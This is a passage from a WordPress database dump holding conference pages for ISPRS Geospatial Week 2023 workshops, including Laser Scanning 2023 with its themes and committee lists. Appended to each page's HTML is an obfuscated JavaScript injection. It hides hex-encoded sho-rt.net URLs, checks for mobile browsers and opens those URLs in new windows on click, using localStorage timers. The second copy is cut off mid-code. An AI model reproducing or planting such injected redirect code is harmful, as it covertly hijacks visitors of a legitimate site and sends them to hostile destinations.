Xia, Technical University of Munich, Germany</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','3DS Smart Cities - 3D Sensing for Smart Cities','','inherit','closed','closed','','2572-revision-v1','','','2023-02-09 06:57:58','2023-02-09 06:57:58','',2572,'https://gsw2023.com/?p=3892',0,'revision','',0),
(3893,1,'2023-02-13 02:48:20','2023-02-13 02:48:20','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Laser Scanning 2023</strong></span></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"54\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n<p>•      Airborne, terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><strong>Organizing Committee:</strong></p>\n<p>Jan Boehm (WG II/2), UCL, United Kingdom</p>\n<p>Bisheng Yang (WG II/2), LIESMARS, Wuhan University, China</p>\n<p>Martin Weinmann, KIT, Germany</p>\n<p>Katharina Anders,  Heidelberg University</p>\n<p>Ruisheng Wang, University of Calgary</p>\n<p>&nbsp;</p>\n<p><strong>Scientific Committee (to be confirmed):</strong></p>\n<p>Ahmad Baik (King Abdul Aziz University, Saudi Arabia)</p>\n<p>Andreas Mayr (University of Innsbruck, Austria)</p>\n<p>Antero Kukko (Finnish Geospatial Research Institute, Finland)</p>\n<p>Bernhard Höfle (Heidelberg University, Germany)</p>\n<p>Camillo Ressl (TU Vienna, Austria)</p>\n<p>Christoph Holst (TU Munich, Germany)</p>\n<p>Daniel Wujanz (Technet, Germany)</p>\n<p>David Belton (Curtin University, Australia)</p>\n<p>David Griffiths (Apple, US)</p>\n<p>Dong Zhen (Wuhan University, China)</p>\n<p>Fabio Panella (Arup, UK)</p>\n<p>Fabio Menna (Bruno Kessler Foundation, Italy)</p>\n<p>Florent Poux (University of Liège, Belgium)</p>\n<p>Francesco Pirotti (University of Padova, Italy)</p>\n<p>Franz Rottensteiner (Leibniz Universität Hannover, Germany)</p>\n<p>Gottfried Mandlburger (TU Wien, Germany)</p>\n<p>Hai Huang (Universität der Bundeswehr München, Germany)</p>\n<p>Kourosh Khoshelham (University of Melbourne, Australia)</p>\n<p>Luigi Barazzetti (Politechnic University of Milan, Italy)</p>\n<p>Lukas Winiwarter (University of British Columbia, Canada)</p>\n<p>Marcus Hebel (Fraunhofer IOSB, Germany)</p>\n<p>Markus Gerke (TU Braunschweig, Germany)</p>\n<p>Mat Disney (UCL, United Kingdom)</p>\n<p>Michael Olsen (Oregon State University, USA)</p>\n<p>Monica Herrero-Huerta (University of Salamanca, Spain)</p>\n<p>Norbert Haala (University of Stuttgart, Germany)</p>\n<p>Roderik Lindenbergh (TU Delft, Netherlands)</p>\n<p>Sander Oude Elberink (ITC – University of Twente, Netherlands)</p>\n<p>Sanna Kaasalainen (Finnish Geospatial Research Institute)</p>\n<p>Thomas Zieher (Austrian Academy of Sciences)</p>\n<p>Tomohiro Mizoguchi (Nihon University, Japan)</p>\n<p>Volker Wichmann (Laserdata GmbH, Austria)</p>\n<p>Wei Yao (Hong Kong Polytechnic University, Hong Kong)</p>\n<p>Wen Xiao (China University of Geosciences, China)</p>\n<p>Xinlian Liang (Finnish Geospatial Research Institute, Finland)</p>\n<p>Yusheng Xu (TU Munich, Germany)</p>\n<p>Zsofia Koma (Aarhus University, Denmark)</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 